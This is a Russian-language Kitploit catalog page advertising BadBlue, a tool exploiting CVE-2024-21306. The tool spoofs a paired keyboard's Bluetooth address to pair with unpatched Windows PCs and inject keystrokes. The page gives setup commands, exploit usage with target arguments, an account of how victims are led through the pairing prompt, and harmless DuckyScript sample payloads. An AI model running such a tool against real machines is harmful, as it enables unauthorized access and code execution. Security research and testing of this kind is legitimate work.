Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
BadBlue — CVE-2024-21306 BadBlue implementation (Using DuckyScript) | Kitploit
Инструменты/GitHubGitHub/phuchaudeveloper/badblue
Bluetooth SecurityPayload GenerationExploitationWireless SecurityPenetration TestingHardware & IoT Security
GitHubphuchaudeveloper/badblue

BadBlue

CVE-2024-21306 BadBlue implementation (Using DuckyScript)

Репозиторий
1222 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

BadBlue (Windows)

CVE-2024-21306 Реализация BadBlue (с использованием DuckyScript)

Неаутентифицированное пирингование, приводящее к выполнению кода (с использованием клавиатуры HID)

Это реализация CVE, обнаруженного marcnewlin

И некоторый код из BlueDucky

Введение

BadBlue — это мощный инструмент для эксплуатации уязвимости в Bluetooth-устройствах. Запустив этот скрипт, вы можете:

  1. Загрузить сохраненные Bluetooth-устройства, которые больше не видны, но Bluetooth все еще включен.
  2. Автоматически сохранять любые устройства, которые вы сканируете.
  3. Отправлять полезную нагрузку в формате ducky script для взаимодействия с устройствами.

Я успешно запускал это на любом Raspberry Pi 4 и VirtualBox с использованием Bluetooth-модуля CSR 4.0, ORICO 4.0 и т.д. Он работает против различных Windows с версией ниже .3007. Компьютер Windows должен быть сопряжен с Bluetooth-клавиатурой, и клавиатура должна быть выключена (или находиться вне зоны действия).

Злоумышленник, используя компьютер с Ubuntu (Kali может работать, но не рекомендуется) и Bluetooth-адаптер на базе Broadcom (CSR 4.0, возможно, может работать), подменяет адрес целевой клавиатуры и подключается к L2CAP 17 на компьютере Windows, указывая возможность SSP-сопряжения NoInputNoOutput.

Жертва увидит уведомление с текстом Add a device Tap to set up your <Keyboard Name>.

Если они проигнорируют уведомление, ничего не произойдет.

Если они нажмут на уведомление, им будет показан диалог запроса сопряжения Bluetooth.

Если у жертвы открыт интерфейс Add a Bluetooth device, они не увидят уведомление, а вместо этого сразу увидят запрос на сопряжение в виде модального диалога.

Злоумышленник может завершить сопряжение после закрытия диалога запроса сопряжения, даже если пользователь нажал Cancel или X. После завершения сопряжения злоумышленник подключается к L2CAP 17 (HID Control).

Затем злоумышленник может подключиться к L2CAP 19 (HID Interrupt) и внедрять произвольные нажатия клавиш.

Установка и использование

Инструкции по настройке

root@kitploit:~
# update apt
sudo apt-get update && sudo apt-get -y upgrade

# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump git \
                    python3-pip python3-setuptools \
                    libbluetooth-dev dbus-x11

# configure bluetoothd to run in compatibility mode to support sdptool
sudo sed -i "s|ExecStart=/usr/lib/bluetooth/bluetoothd|ExecStart=/usr/lib/bluetooth/bluetoothd --compat|g" /lib/systemd/system/bluetooth.service
sudo systemctl daemon-reload
sudo systemctl restart bluetooth

# install pybluez
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
python3 -m pip install pydbus

# build bdaddr from bluez
cd ~
git clone https://github.com/bluez/bluez.git
cd bluez
gcc -o bdaddr tools/bdaddr.c src/oui.c -lbluetooth -I.
sudo cp bdaddr /usr/local/bin/

Запуск BadBlue

root@kitploit:~
# clone this repository
git clone https://github.com/PhucHauDeveloper/BadBlue.git
cd BadBlue
python3 BadBlue.py
  1. Сопрягите Bluetooth-клавиатуру с целевым компьютером Windows и выключите клавиатуру
  2. На компьютере Ubuntu запустите PoC: ./BadBlue.py -i <Interface> -k <Keyboard-Address> -c <Windows-Address>
  3. Нажмите на уведомление, когда оно появится на компьютере Windows
  4. Закройте диалог запроса сопряжения (или нажмите Cancel или Approve)
  5. В случае успеха машина Ubuntu подключится к машине Windows и внедрит неразрушающую полезную нагрузку

-k — это клавиатура (по умолчанию моя клавиатура F4:73:35:7A:4B:BB, вам нужно изменить это)

-i — интерфейс (по умолчанию hci0)

-c — целевые устройства Windows (оставьте пустым, инструмент автоматически просканирует для вас)

Duckyscript

В разработке:

  • Предложите мне идеи

Известная ошибка

Возможно, при первом использовании отсутствует readchar, используйте следующую команду:

root@kitploit:~
pip install readchar

Этот инструмент должен запускаться в графической среде, CLI может вызвать ошибку dbus-launch, если вы знаете, как это исправить, свяжитесь со мной.

Пример payload.txt:

root@kitploit:~
REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
root@kitploit:~
REM Opens RickRoll
DELAY 200
GUI r
DELAY 200
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
DELAY 300
ENTER
DELAY 300

Наслаждайтесь экспериментами с BadBlue!

Скачать инструмент